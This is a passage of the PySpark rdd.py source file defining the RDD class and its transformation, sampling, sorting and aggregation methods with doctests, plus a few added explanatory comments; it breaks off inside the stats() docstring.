# rdd.py
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import copy
import sys
import os
import re
import operator
import shlex
import warnings
import heapq
import bisect
import random
import socket
from subprocess import Popen, PIPE
from tempfile import NamedTemporaryFile
from threading import Thread
from collections import defaultdict
from itertools import chain
from functools import reduce
from math import sqrt, log, isinf, isnan, pow, ceil
if sys.version > '3':
basestring = unicode = str
else:
from itertools import imap as map, ifilter as filter
from pyspark.java_gateway import local_connect_and_auth
from pyspark.serializers import NoOpSerializer, CartesianDeserializer, \
BatchedSerializer, CloudPickleSerializer, PairDeserializer, \
PickleSerializer, pack_long, AutoBatchedSerializer, write_with_length, \
UTF8Deserializer
from pyspark.join import python_join, python_left_outer_join, \
python_right_outer_join, python_full_outer_join, python_cogroup
from pyspark.statcounter import StatCounter
from pyspark.rddsampler import RDDSampler, RDDRangeSampler, RDDStratifiedSampler
from pyspark.storagelevel import StorageLevel
from pyspark.resultiterable import ResultIterable
from pyspark.shuffle import Aggregator, ExternalMerger, \
get_used_memory, ExternalSorter, ExternalGroupBy
from pyspark.traceback_utils import SCCallSiteSync
from pyspark.util import fail_on_stopiteration, _exception_message
__all__ = ["RDD"]
class PythonEvalType(object):
"""
Evaluation type of python rdd.
These values are internal to PySpark.
These values should match values in org.apache.spark.api.python.PythonEvalType.
"""
NON_UDF = 0
SQL_BATCHED_UDF = 100
SQL_SCALAR_PANDAS_UDF = 200
SQL_GROUPED_MAP_PANDAS_UDF = 201
SQL_GROUPED_AGG_PANDAS_UDF = 202
SQL_WINDOW_AGG_PANDAS_UDF = 203
def portable_hash(x):
"""
This function returns a consistent hash code for builtin types, especially
for None and tuples containing None.
The algorithm is similar to the one used by CPython 2.7
>>> portable_hash(None)
0
>>> portable_hash((None, 1)) & 0xffffffff
219750521
"""
if sys.version_info >= (3, 2, 3) and 'PYTHONHASHSEED' not in os.environ:
raise Exception("Randomness of hash of string should be disabled via PYTHONHASHSEED")
if x is None:
return 0
if isinstance(x, tuple):
h = 0x345678
for i in x:
h ^= portable_hash(i)
h *= 1000003
h &= sys.maxsize
h ^= len(x)
if h == -1:
h = -2
return int(h)
return hash(x)
class BoundedFloat(float):
"""
A bounded value generated by an approximate job, carrying a confidence level
together with low and high bounds.
>>> BoundedFloat(100.0, 0.95, 95.0, 105.0)
100.0
"""
def __new__(cls, mean, confidence, low, high):
obj = float.__new__(cls, mean)
obj.confidence = confidence
obj.low = low
obj.high = high
return obj
def _parse_memory(s):
"""
Parse a memory string in the format supported by Java (e.g. 1g, 200m) and
return the value in MB
>>> _parse_memory("256m")
256
>>> _parse_memory("2g")
2048
"""
units = {'g': 1024, 'm': 1, 't': 1 << 20, 'k': 1.0 / 1024}
if s[-1].lower() not in units:
raise ValueError("invalid format: " + s)
return int(float(s[:-1]) * units[s[-1].lower()])
def _load_from_socket(sock_info, serializer):
(sockfile, sock) = local_connect_and_auth(*sock_info)
# The RDD materialization time is unpredictable; if we set a timeout for the socket read
# operation, it will very likely fail. See SPARK-18281.
sock.settimeout(None)
# The socket will be automatically closed when garbage-collected.
return serializer.load_stream(sockfile)
def ignore_unicode_prefix(f):
"""
Ignore the 'u' prefix of strings in doctests, to make them work
in both Python 2 and 3
"""
if sys.version >= '3':
# the representation of unicode string in Python 3 does not have prefix 'u',
# so remove the prefix 'u' for doc tests
literal_re = re.compile(r"(\W|^)[uU](['])", re.UNICODE)
f.__doc__ = literal_re.sub(r'\1\2', f.__doc__)
return f
class Partitioner(object):
def __init__(self, numPartitions, partitionFunc):
self.numPartitions = numPartitions
self.partitionFunc = partitionFunc
def __eq__(self, other):
return (isinstance(other, Partitioner) and self.numPartitions == other.numPartitions
and self.partitionFunc == other.partitionFunc)
def __call__(self, k):
return self.partitionFunc(k) % self.numPartitions
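# Illustrative usage note (an editor's sketch, not part of the original source):
#
#   p = Partitioner(2, portable_hash)
#   p("a") == portable_hash("a") % 2   # always 0 or 1
#
# Two Partitioner objects compare equal only when both the partition count and the
# partition function match; partitionBy() below relies on this equality check to skip
# a re-shuffle when an RDD is already partitioned the same way.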
class RDD(object):
"""
A Resilient Distributed Dataset (RDD), the basic abstraction in Spark.
Represents an immutable, partitioned collection of elements that can be
operated on in parallel.
"""
def __init__(self, jrdd, ctx, jrdd_deserializer=AutoBatchedSerializer(PickleSerializer())):
self._jrdd = jrdd
self.is_cached = False
self.is_checkpointed = False
self.ctx = ctx
self._jrdd_deserializer = jrdd_deserializer
self._id = jrdd.id()
self.partitioner = None
def _pickled(self):
return self._reserialize(AutoBatchedSerializer(PickleSerializer()))
def id(self):
"""
A unique ID for this RDD (within its SparkContext).
"""
return self._id
def __repr__(self):
return self._jrdd.toString()
def __getnewargs__(self):
# This method is called when attempting to pickle an RDD, which is always an error:
raise Exception(
"It appears that you are attempting to broadcast an RDD or reference an RDD from an "
"action or transformation. RDD transformations and actions can only be invoked by the "
"driver, not inside of other transformations; for example, "
"rdd1.map(lambda x: rdd2.values.count() * x) is invalid because the values "
"transformation and count action cannot be performed inside of the rdd1.map "
"transformation. For more information, see SPARK-5063."
)
@property
def context(self):
"""
The L{SparkContext} that this RDD was created on.
"""
return self.ctx
def cache(self):
"""
Persist this RDD with the default storage level (C{MEMORY_ONLY}).
"""
self.is_cached = True
self.persist(StorageLevel.MEMORY_ONLY)
return self
def persist(self, storageLevel=StorageLevel.MEMORY_ONLY):
"""
Set this RDD's storage level to persist its values across operations
after the first time it is computed. This can only be used to assign
a new storage level if the RDD does not have a storage level set yet.
If no storage level is specified, it defaults to C{MEMORY_ONLY}.
>>> rdd = sc.parallelize(["b", "a", "c"])
>>> rdd.persist().is_cached
True
"""
self.is_cached = True
javaStorageLevel = self.ctx._getJavaStorageLevel(storageLevel)
self._jrdd.persist(javaStorageLevel)
return self
def unpersist(self):
"""
Mark the RDD as non-persistent, and remove all blocks for it from
memory and disk.
"""
self.is_cached = False
self._jrdd.unpersist()
return self
def checkpoint(self):
"""
Mark this RDD for checkpointing. It will be saved to a file inside the
checkpoint directory set with L{SparkContext.setCheckpointDir()} and
all references to its parent RDDs will be removed. This function must
be called before any job has been executed on this RDD. It is strongly
recommended that this RDD is persisted in memory; otherwise, saving it
to a file will require recomputation.
"""
self.is_checkpointed = True
self._jrdd.rdd().checkpoint()
def isCheckpointed(self):
"""
Return whether this RDD is checkpointed and materialized, either reliably or locally.
"""
return self._jrdd.rdd().isCheckpointed()
def localCheckpoint(self):
"""
Mark this RDD for local checkpointing using Spark's existing caching layer.
This method is for users who wish to truncate RDD lineages while skipping the expensive
step of replicating the materialized data in a reliable distributed file system. This is
useful for RDDs with long lineages that need to be truncated periodically (e.g. GraphX).
Local checkpointing sacrifices fault-tolerance for performance. In particular, checkpointed
data is written to ephemeral local storage in the executors instead of to a reliable,
fault-tolerant storage. The effect is that if an executor fails during the computation,
the checkpointed data may no longer be accessible, causing an irrecoverable job failure.
This is NOT safe to use with dynamic allocation, which removes executors along
with their cached blocks. If you must use both features, you are advised to set
L{spark.dynamicAllocation.cachedExecutorIdleTimeout} to a high value.
The checkpoint directory set through L{SparkContext.setCheckpointDir()} is not used.
"""
self._jrdd.rdd().localCheckpoint()
def isLocallyCheckpointed(self):
"""
Return whether this RDD is marked for local checkpointing.
Exposed for testing.
"""
return self._jrdd.rdd().isLocallyCheckpointed()
def getCheckpointFile(self):
"""
Gets the name of the file to which this RDD was checkpointed.
Not defined if the RDD is checkpointed locally.
"""
checkpointFile = self._jrdd.rdd().getCheckpointFile()
if checkpointFile.isDefined():
return checkpointFile.get()
def map(self, f, preservesPartitioning=False):
"""
Return a new RDD by applying a function to each element of this RDD.
>>> rdd = sc.parallelize(["b", "a", "c"])
>>> sorted(rdd.map(lambda x: (x, 1)).collect())
[('a', 1), ('b', 1), ('c', 1)]
"""
def func(_, iterator):
return map(fail_on_stopiteration(f), iterator)
return self.mapPartitionsWithIndex(func, preservesPartitioning)
def flatMap(self, f, preservesPartitioning=False):
"""
Return a new RDD by first applying a function to all elements of this
RDD, and then flattening the results.
>>> rdd = sc.parallelize([2, 3, 4])
>>> sorted(rdd.flatMap(lambda x: range(1, x)).collect())
[1, 1, 1, 2, 2, 3]
>>> sorted(rdd.flatMap(lambda x: [(x, x), (x, x)]).collect())
[(2, 2), (2, 2), (3, 3), (3, 3), (4, 4), (4, 4)]
"""
def func(s, iterator):
return chain.from_iterable(map(fail_on_stopiteration(f), iterator))
return self.mapPartitionsWithIndex(func, preservesPartitioning)
def mapPartitions(self, f, preservesPartitioning=False):
"""
Return a new RDD by applying a function to each partition of this RDD.
>>> rdd = sc.parallelize([1, 2, 3, 4], 2)
>>> def f(iterator): yield sum(iterator)
>>> rdd.mapPartitions(f).collect()
[3, 7]
"""
def func(s, iterator):
return f(iterator)
return self.mapPartitionsWithIndex(func, preservesPartitioning)
def mapPartitionsWithIndex(self, f, preservesPartitioning=False):
"""
Return a new RDD by applying a function to each partition of this RDD,
while tracking the index of the original partition.
>>> rdd = sc.parallelize([1, 2, 3, 4], 4)
>>> def f(splitIndex, iterator): yield splitIndex
>>> rdd.mapPartitionsWithIndex(f).sum()
6
"""
return PipelinedRDD(self, f, preservesPartitioning)
def mapPartitionsWithSplit(self, f, preservesPartitioning=False):
"""
Deprecated: use mapPartitionsWithIndex instead.
Return a new RDD by applying a function to each partition of this RDD,
while tracking the index of the original partition.
>>> rdd = sc.parallelize([1, 2, 3, 4], 4)
>>> def f(splitIndex, iterator): yield splitIndex
>>> rdd.mapPartitionsWithSplit(f).sum()
6
"""
warnings.warn("mapPartitionsWithSplit is deprecated; "
"use mapPartitionsWithIndex instead", DeprecationWarning, stacklevel=2)
return self.mapPartitionsWithIndex(f, preservesPartitioning)
def getNumPartitions(self):
"""
Returns the number of partitions in this RDD.
>>> rdd = sc.parallelize([1, 2, 3, 4], 2)
>>> rdd.getNumPartitions()
2
"""
return self._jrdd.partitions().size()
def filter(self, f):
"""
Return a new RDD containing only the elements that satisfy a predicate.
>>> rdd = sc.parallelize([1, 2, 3, 4, 5])
>>> rdd.filter(lambda x: x % 2 == 0).collect()
[2, 4]
"""
def func(iterator):
return filter(fail_on_stopiteration(f), iterator)
return self.mapPartitions(func, True)
def distinct(self, numPartitions=None):
"""
Return a new RDD containing the distinct elements in this RDD.
>>> sorted(sc.parallelize([1, 1, 2, 3]).distinct().collect())
[1, 2, 3]
"""
return self.map(lambda x: (x, None)) \
.reduceByKey(lambda x, _: x, numPartitions) \
.map(lambda x: x[0])
def sample(self, withReplacement, fraction, seed=None):
"""
Return a sampled subset of this RDD.
:param withReplacement: can elements be sampled multiple times (replaced when sampled out)
:param fraction: expected size of the sample as a fraction of this RDD's size
without replacement: probability that each element is chosen; fraction must be [0, 1]
with replacement: expected number of times each element is chosen; fraction must be >= 0
:param seed: seed for the random number generator
.. note:: This is not guaranteed to provide exactly the fraction specified of the total
count of this :class:`RDD`.
>>> rdd = sc.parallelize(range(100), 4)
>>> 6 <= rdd.sample(False, 0.1, 81).count() <= 14
True
"""
assert fraction >= 0.0, "Negative fraction value: %s" % fraction
return self.mapPartitionsWithIndex(RDDSampler(withReplacement, fraction, seed).func, True)
def randomSplit(self, weights, seed=None):
"""
Randomly splits this RDD with the provided weights.
:param weights: weights for splits, will be normalized if they don't sum to 1
:param seed: random seed
:return: split RDDs in a list
>>> rdd = sc.parallelize(range(500), 1)
>>> rdd1, rdd2 = rdd.randomSplit([2, 3], 17)
>>> len(rdd1.collect() + rdd2.collect())
500
>>> 150 < rdd1.count() < 250
True
>>> 250 < rdd2.count() < 350
True
"""
s = float(sum(weights))
cweights = [0.0]
for w in weights:
cweights.append(cweights[-1] + w / s)
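# e.g. weights [2, 3] normalize to cumulative bounds [0.0, 0.4, 1.0], giving the two
# samplers the disjoint ranges [0.0, 0.4) and [0.4, 1.0); since all splits share the
# same seed, every element falls into exactly one split (illustrative note).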
if seed is None:
seed = random.randint(0, 2 ** 32 - 1)
return [self.mapPartitionsWithIndex(RDDRangeSampler(lb, ub, seed).func, True)
for lb, ub in zip(cweights, cweights[1:])]
# this is ported from scala/spark/RDD.scala
def takeSample(self, withReplacement, num, seed=None):
"""
Return a fixed-size sampled subset of this RDD.
.. note:: This method should only be used if the resulting array is expected
to be small, as all the data is loaded into the driver's memory.
>>> rdd = sc.parallelize(range(0, 10))
>>> len(rdd.takeSample(True, 20, 1))
20
>>> len(rdd.takeSample(False, 5, 2))
5
>>> len(rdd.takeSample(False, 15, 3))
10
"""
numStDev = 10.0
if num < 0:
raise ValueError("Sample size cannot be negative.")
elif num == 0:
return []
initialCount = self.count()
if initialCount == 0:
return []
rand = random.Random(seed)
if (not withReplacement) and num >= initialCount:
# shuffle current RDD and return
samples = self.collect()
rand.shuffle(samples)
return samples
maxSampleSize = sys.maxsize - int(numStDev * sqrt(sys.maxsize))
if num > maxSampleSize:
raise ValueError(
"Sample size cannot be greater than %d." % maxSampleSize)
fraction = RDD._computeFractionForSampleSize(
num, initialCount, withReplacement)
samples = self.sample(withReplacement, fraction, seed).collect()
# If the first sample didn't turn out large enough, keep trying to take samples;
# this shouldn't happen often because we use a big multiplier for their initial size.
# See: scala/spark/RDD.scala
while len(samples) < num:
# TODO: add log warning for when more than one iteration was run
seed = rand.randint(0, sys.maxsize)
samples = self.sample(withReplacement, fraction, seed).collect()
rand.shuffle(samples)
return samples[0:num]
@staticmethod
def _computeFractionForSampleSize(sampleSizeLowerBound, total, withReplacement):
"""
Returns a sampling rate that guarantees a sample of
size >= sampleSizeLowerBound 99.99% of the time.
How the sampling rate is determined:
Let p = num / total, where num is the sample size and total is the
total number of data points in the RDD. We're trying to compute
q > p such that
- when sampling with replacement, we're drawing each data point
with prob_i ~ Pois(q), where we want to guarantee
Pr[s < num] < 0.0001 for s = sum(prob_i for i from 0 to
total), i.e. the failure rate of not having a sufficiently large
sample < 0.0001. Setting q = p + 5 * sqrt(p/total) is sufficient
to guarantee 0.9999 success rate for num > 12, but we need a
slightly larger q (9 empirically determined).
- when sampling without replacement, we're drawing each data point
with prob_i ~ Binomial(total, fraction) and our choice of q
guarantees 1-delta, or 0.9999 success rate, where success rate is
defined the same as in sampling with replacement.
"""
fraction = float(sampleSizeLowerBound) / total
if withReplacement:
numStDev = 5
if (sampleSizeLowerBound < 12):
numStDev = 9
return fraction + numStDev * sqrt(fraction / total)
else:
delta = 0.00005
gamma = - log(delta) / total
return min(1, fraction + gamma + sqrt(gamma * gamma + 2 * gamma * fraction))
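# Rough worked example (approximate figures, for illustration only): asking for
# num=5 out of total=100 without replacement gives fraction = 0.05,
# gamma = -log(0.00005) / 100 ~= 0.099, and a returned rate of about 0.29 -- i.e.
# sample() is asked for far more than 5% so that at least 5 rows come back with
# probability 0.9999.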
def union(self, other):
"""
Return the union of this RDD and another one.
>>> rdd = sc.parallelize([1, 1, 2, 3])
>>> rdd.union(rdd).collect()
[1, 1, 2, 3, 1, 1, 2, 3]
"""
if self._jrdd_deserializer == other._jrdd_deserializer:
rdd = RDD(self._jrdd.union(other._jrdd), self.ctx,
self._jrdd_deserializer)
else:
# These RDDs contain data in different serialized formats, so we
# must normalize them to the default serializer.
self_copy = self._reserialize()
other_copy = other._reserialize()
rdd = RDD(self_copy._jrdd.union(other_copy._jrdd), self.ctx,
self.ctx.serializer)
if (self.partitioner == other.partitioner and
self.getNumPartitions() == rdd.getNumPartitions()):
rdd.partitioner = self.partitioner
return rdd
def intersection(self, other):
"""
Return the intersection of this RDD and another one. The output will
not contain any duplicate elements, even if the input RDDs did.
.. note:: This method performs a shuffle internally.
>>> rdd1 = sc.parallelize([1, 10, 2, 3, 4, 5])
>>> rdd2 = sc.parallelize([1, 6, 2, 3, 7, 8])
>>> rdd1.intersection(rdd2).collect()
[1, 2, 3]
"""
return self.map(lambda v: (v, None)) \
.cogroup(other.map(lambda v: (v, None))) \
.filter(lambda k_vs: all(k_vs[1])) \
.keys()
def _reserialize(self, serializer=None):
serializer = serializer or self.ctx.serializer
if self._jrdd_deserializer != serializer:
self = self.map(lambda x: x, preservesPartitioning=True)
self._jrdd_deserializer = serializer
return self
def __add__(self, other):
"""
Return the union of this RDD and another one.
>>> rdd = sc.parallelize([1, 1, 2, 3])
>>> (rdd + rdd).collect()
[1, 1, 2, 3, 1, 1, 2, 3]
"""
if not isinstance(other, RDD):
raise TypeError
return self.union(other)
def repartitionAndSortWithinPartitions(self, numPartitions=None, partitionFunc=portable_hash,
ascending=True, keyfunc=lambda x: x):
"""
Repartition the RDD according to the given partitioner and, within each resulting partition,
sort records by their keys.
>>> rdd = sc.parallelize([(0, 5), (3, 8), (2, 6), (0, 8), (3, 8), (1, 3)])
>>> rdd2 = rdd.repartitionAndSortWithinPartitions(2, lambda x: x % 2, True)
>>> rdd2.glom().collect()
[[(0, 5), (0, 8), (2, 6)], [(1, 3), (3, 8), (3, 8)]]
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
memory = _parse_memory(self.ctx._conf.get("spark.python.worker.memory", "512m"))
serializer = self._jrdd_deserializer
def sortPartition(iterator):
sort = ExternalSorter(memory * 0.9, serializer).sorted
return iter(sort(iterator, key=lambda k_v: keyfunc(k_v[0]), reverse=(not ascending)))
return self.partitionBy(numPartitions, partitionFunc).mapPartitions(sortPartition, True)
def sortByKey(self, ascending=True, numPartitions=None, keyfunc=lambda x: x):
"""
Sorts this RDD, which is assumed to consist of (key, value) pairs.
>>> tmp = [('a', 1), ('b', 2), ('1', 3), ('d', 4), ('2', 5)]
>>> sc.parallelize(tmp).sortByKey().first()
('1', 3)
>>> sc.parallelize(tmp).sortByKey(True, 1).collect()
[('1', 3), ('2', 5), ('a', 1), ('b', 2), ('d', 4)]
>>> sc.parallelize(tmp).sortByKey(True, 2).collect()
[('1', 3), ('2', 5), ('a', 1), ('b', 2), ('d', 4)]
>>> tmp2 = [('Mary', 1), ('had', 2), ('a', 3), ('little', 4), ('lamb', 5)]
>>> tmp2.extend([('whose', 6), ('fleece', 7), ('was', 8), ('white', 9)])
>>> sc.parallelize(tmp2).sortByKey(True, 3, keyfunc=lambda k: k.lower()).collect()
[('a', 3), ('fleece', 7), ('had', 2), ('lamb', 5),...('white', 9), ('whose', 6)]
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
memory = self._memory_limit()
serializer = self._jrdd_deserializer
def sortPartition(iterator):
sort = ExternalSorter(memory * 0.9, serializer).sorted
return iter(sort(iterator, key=lambda kv: keyfunc(kv[0]), reverse=(not ascending)))
if numPartitions == 1:
if self.getNumPartitions() > 1:
self = self.coalesce(1)
return self.mapPartitions(sortPartition, True)
# first compute the boundary of each part via sampling: we want to partition
# the key-space into bins such that the bins have roughly the same
# number of (key, value) pairs falling into them
rddSize = self.count()
if not rddSize:
return self # empty RDD
maxSampleSize = numPartitions * 20.0 # constant from Spark's RangePartitioner
fraction = min(maxSampleSize / max(rddSize, 1), 1.0)
samples = self.sample(False, fraction, 1).map(lambda kv: kv[0]).collect()
samples = sorted(samples, key=keyfunc)
# we have numPartitions many parts but one of them has
# an implicit boundary
bounds = [samples[int(len(samples) * (i + 1) / numPartitions)]
for i in range(0, numPartitions - 1)]
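# e.g. with numPartitions=3 and 30 sorted sample keys, bounds picks the keys at
# indices 10 and 20 (the 1/3 and 2/3 quantiles); rangePartitioner below then sends
# keys below the first bound to partition 0, keys between the bounds to partition 1,
# and the rest to partition 2 (illustrative note).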
def rangePartitioner(k):
p = bisect.bisect_left(bounds, keyfunc(k))
if ascending:
return p
else:
return numPartitions - 1 - p
return self.partitionBy(numPartitions, rangePartitioner).mapPartitions(sortPartition, True)
def sortBy(self, keyfunc, ascending=True, numPartitions=None):
"""
Sorts this RDD by the given keyfunc
>>> tmp = [('a', 1), ('b', 2), ('1', 3), ('d', 4), ('2', 5)]
>>> sc.parallelize(tmp).sortBy(lambda x: x[0]).collect()
[('1', 3), ('2', 5), ('a', 1), ('b', 2), ('d', 4)]
>>> sc.parallelize(tmp).sortBy(lambda x: x[1]).collect()
[('a', 1), ('b', 2), ('1', 3), ('d', 4), ('2', 5)]
"""
return self.keyBy(keyfunc).sortByKey(ascending, numPartitions).values()
def glom(self):
"""
Return an RDD created by coalescing all elements within each partition
into a list.
>>> rdd = sc.parallelize([1, 2, 3, 4], 2)
>>> sorted(rdd.glom().collect())
[[1, 2], [3, 4]]
"""
def func(iterator):
yield list(iterator)
return self.mapPartitions(func)
def cartesian(self, other):
"""
Return the Cartesian product of this RDD and another one, that is, the
RDD of all pairs of elements C{(a, b)} where C{a} is in C{self} and
C{b} is in C{other}.
>>> rdd = sc.parallelize([1, 2])
>>> sorted(rdd.cartesian(rdd).collect())
[(1, 1), (1, 2), (2, 1), (2, 2)]
"""
# Due to batching, we can't use the Java cartesian method.
deserializer = CartesianDeserializer(self._jrdd_deserializer,
other._jrdd_deserializer)
return RDD(self._jrdd.cartesian(other._jrdd), self.ctx, deserializer)
def groupBy(self, f, numPartitions=None, partitionFunc=portable_hash):
"""
Return an RDD of grouped items.
>>> rdd = sc.parallelize([1, 1, 2, 3, 5, 8])
>>> result = rdd.groupBy(lambda x: x % 2).collect()
>>> sorted([(x, sorted(y)) for (x, y) in result])
[(0, [2, 8]), (1, [1, 1, 3, 5])]
"""
return self.map(lambda x: (f(x), x)).groupByKey(numPartitions, partitionFunc)
@ignore_unicode_prefix
def pipe(self, command, env=None, checkCode=False):
"""
Return an RDD created by piping elements to a forked external process.
>>> sc.parallelize(['1', '2', '', '3']).pipe('cat').collect()
[u'1', u'2', u'', u'3']
:param checkCode: whether or not to check the return value of the shell command.
"""
if env is None:
env = dict()
def func(iterator):
pipe = Popen(
shlex.split(command), env=env, stdin=PIPE, stdout=PIPE)
def pipe_objs(out):
for obj in iterator:
s = unicode(obj).rstrip('\n') + '\n'
out.write(s.encode('utf-8'))
out.close()
Thread(target=pipe_objs, args=[pipe.stdin]).start()
def check_return_code():
pipe.wait()
if checkCode and pipe.returncode:
raise Exception("Pipe function `%s' exited "
"with error code %d" % (command, pipe.returncode))
else:
for i in range(0):
yield i
return (x.rstrip(b'\n').decode('utf-8') for x in
chain(iter(pipe.stdout.readline, b''), check_return_code()))
return self.mapPartitions(func)
def foreach(self, f):
"""
Applies a function to all elements of this RDD.
>>> def f(x): print(x)
>>> sc.parallelize([1, 2, 3, 4, 5]).foreach(f)
"""
f = fail_on_stopiteration(f)
def processPartition(iterator):
for x in iterator:
f(x)
return iter([])
self.mapPartitions(processPartition).count() # Force evaluation
def foreachPartition(self, f):
"""
Applies a function to each partition of this RDD.
>>> def f(iterator):
... for x in iterator:
... print(x)
>>> sc.parallelize([1, 2, 3, 4, 5]).foreachPartition(f)
"""
def func(it):
r = f(it)
try:
return iter(r)
except TypeError:
return iter([])
self.mapPartitions(func).count() # Force evaluation
def collect(self):
"""
Return a list that contains all of the elements in this RDD.
.. note:: This method should only be used if the resulting array is expected
to be small, as all the data is loaded into the driver's memory.
"""
with SCCallSiteSync(self.context) as css:
sock_info = self.ctx._jvm.PythonRDD.collectAndServe(self._jrdd.rdd())
return list(_load_from_socket(sock_info, self._jrdd_deserializer))
def reduce(self, f):
"""
Reduces the elements of this RDD using the specified commutative and
associative binary operator. Currently reduces partitions locally.
>>> from operator import add
>>> sc.parallelize([1, 2, 3, 4, 5]).reduce(add)
15
>>> sc.parallelize((2 for _ in range(10))).map(lambda x: 1).cache().reduce(add)
10
>>> sc.parallelize([]).reduce(add)
Traceback (most recent call last):
...
ValueError: Can not reduce() empty RDD
"""
f = fail_on_stopiteration(f)
def func(iterator):
iterator = iter(iterator)
try:
initial = next(iterator)
except StopIteration:
return
yield reduce(f, iterator, initial)
vals = self.mapPartitions(func).collect()
if vals:
return reduce(f, vals)
raise ValueError("Can not reduce() empty RDD")
def treeReduce(self, f, depth=2):
"""
Reduces the elements of this RDD in a multi-level tree pattern.
:param depth: suggested depth of the tree (default: 2)
>>> add = lambda x, y: x + y
>>> rdd = sc.parallelize([-5, -4, -3, -2, -1, 1, 2, 3, 4], 10)
>>> rdd.treeReduce(add)
-5
>>> rdd.treeReduce(add, 1)
-5
>>> rdd.treeReduce(add, 2)
-5
>>> rdd.treeReduce(add, 5)
-5
>>> rdd.treeReduce(add, 10)
-5
"""
if depth < 1:
raise ValueError("Depth cannot be smaller than 1 but got %d." % depth)
zeroValue = None, True # Use the second entry to indicate whether this is a dummy value.
def op(x, y):
if x[1]:
return y
elif y[1]:
return x
else:
return f(x[0], y[0]), False
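# e.g. op((None, True), (5, False)) returns (5, False), and
# op((5, False), (7, False)) returns (f(5, 7), False); the dummy marker only
# survives if every partition was empty, which is how the empty-RDD case is
# detected below (illustrative note).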
reduced = self.map(lambda x: (x, False)).treeAggregate(zeroValue, op, op, depth)
if reduced[1]:
raise ValueError("Cannot reduce empty RDD.")
return reduced[0]
def fold(self, zeroValue, op):
"""
Aggregate the elements of each partition, and then the results for all
the partitions, using a given associative function and a neutral "zero value."
The function C{op(t1, t2)} is allowed to modify C{t1} and return it
as its result value to avoid object allocation; however, it should not
modify C{t2}.
This behaves somewhat differently from fold operations implemented
for non-distributed collections in functional languages like Scala.
This fold operation may be applied to partitions individually, and then
fold those results into the final result, rather than apply the fold
to each element sequentially in some defined ordering. For functions
that are not commutative, the result may differ from that of a fold
applied to a non-distributed collection.
>>> from operator import add
>>> sc.parallelize([1, 2, 3, 4, 5]).fold(0, add)
15
"""
op = fail_on_stopiteration(op)
def func(iterator):
acc = zeroValue
for obj in iterator:
acc = op(acc, obj)
yield acc
# collecting result of mapPartitions here ensures that the copy of
# zeroValue provided to each partition is unique from the one provided
# to the final reduce call
vals = self.mapPartitions(func).collect()
return reduce(op, vals, zeroValue)
def aggregate(self, zeroValue, seqOp, combOp):
"""
Aggregate the elements of each partition, and then the results for all
the partitions, using a given combine functions and a neutral "zero
value."
The functions C{op(t1, t2)} are allowed to modify C{t1} and return it
as their result value to avoid object allocation; however, they should not
modify C{t2}.
The first function (seqOp) can return a different result type, U, than
the type of this RDD. Thus, we need one operation for merging a T into
a U and one operation for merging two U's.
>>> seqOp = (lambda x, y: (x[0] + y, x[1] + 1))
>>> combOp = (lambda x, y: (x[0] + y[0], x[1] + y[1]))
>>> sc.parallelize([1, 2, 3, 4]).aggregate((0, 0), seqOp, combOp)
(10, 4)
>>> sc.parallelize([]).aggregate((0, 0), seqOp, combOp)
(0, 0)
"""
seqOp = fail_on_stopiteration(seqOp)
combOp = fail_on_stopiteration(combOp)
def func(iterator):
acc = zeroValue
for obj in iterator:
acc = seqOp(acc, obj)
yield acc
# collecting result of mapPartitions here ensures that the copy of
# zeroValue provided to each partition is unique from the one provided
# to the final reduce call
vals = self.mapPartitions(func).collect()
return reduce(combOp, vals, zeroValue)
def treeAggregate(self, zeroValue, seqOp, combOp, depth=2):
"""
Aggregates the elements of this RDD in a multi-level tree
pattern.
:param depth: suggested depth of the tree (default: 2)
>>> add = lambda x, y: x + y
>>> rdd = sc.parallelize([-5, -4, -3, -2, -1, 1, 2, 3, 4], 10)
>>> rdd.treeAggregate(0, add, add)
-5
>>> rdd.treeAggregate(0, add, add, 1)
-5
>>> rdd.treeAggregate(0, add, add, 2)
-5
>>> rdd.treeAggregate(0, add, add, 5)
-5
>>> rdd.treeAggregate(0, add, add, 10)
-5
"""
if depth < 1:
raise ValueError("Depth cannot be smaller than 1 but got %d." % depth)
if self.getNumPartitions() == 0:
return zeroValue
def aggregatePartition(iterator):
acc = zeroValue
for obj in iterator:
acc = seqOp(acc, obj)
yield acc
partiallyAggregated = self.mapPartitions(aggregatePartition)
numPartitions = partiallyAggregated.getNumPartitions()
scale = max(int(ceil(pow(numPartitions, 1.0 / depth))), 2)
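# e.g. with 10 partitions and depth=2, scale = max(ceil(10 ** 0.5), 2) = 4, so the
# loop below first combines the 10 partial results down to 2 partitions before the
# final reduce on the driver (illustrative note).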
# If creating an extra level doesn't help reduce the wall-clock time, we stop the tree
# aggregation.
while numPartitions > scale + numPartitions / scale:
numPartitions /= scale
curNumPartitions = int(numPartitions)
def mapPartition(i, iterator):
for obj in iterator:
yield (i % curNumPartitions, obj)
partiallyAggregated = partiallyAggregated \
.mapPartitionsWithIndex(mapPartition) \
.reduceByKey(combOp, curNumPartitions) \
.values()
return partiallyAggregated.reduce(combOp)
def max(self, key=None):
"""
Find the maximum item in this RDD.
:param key: A function used to generate key for comparing
>>> rdd = sc.parallelize([1.0, 5.0, 43.0, 10.0])
>>> rdd.max()
43.0
>>> rdd.max(key=str)
5.0
"""
if key is None:
return self.reduce(max)
return self.reduce(lambda a, b: max(a, b, key=key))
def min(self, key=None):
"""
Find the minimum item in this RDD.
:param key: A function used to generate key for comparing
>>> rdd = sc.parallelize([2.0, 5.0, 43.0, 10.0])
>>> rdd.min()
2.0
>>> rdd.min(key=str)
10.0
"""
if key is None:
return self.reduce(min)
return self.reduce(lambda a, b: min(a, b, key=key))
def sum(self):
"""
Add up the elements in this RDD.
>>> sc.parallelize([1.0, 2.0, 3.0]).sum()
6.0
"""
return self.mapPartitions(lambda x: [sum(x)]).fold(0, operator.add)
def count(self):
"""
Return the number of elements in this RDD.
>>> sc.parallelize([2, 3, 4]).count()
3
"""
return self.mapPartitions(lambda i: [sum(1 for _ in i)]).sum()
def stats(self):
"""
Return a L{StatCounter} object that captures the mean, variance
and count of the RDD's elements in one operation.
"""
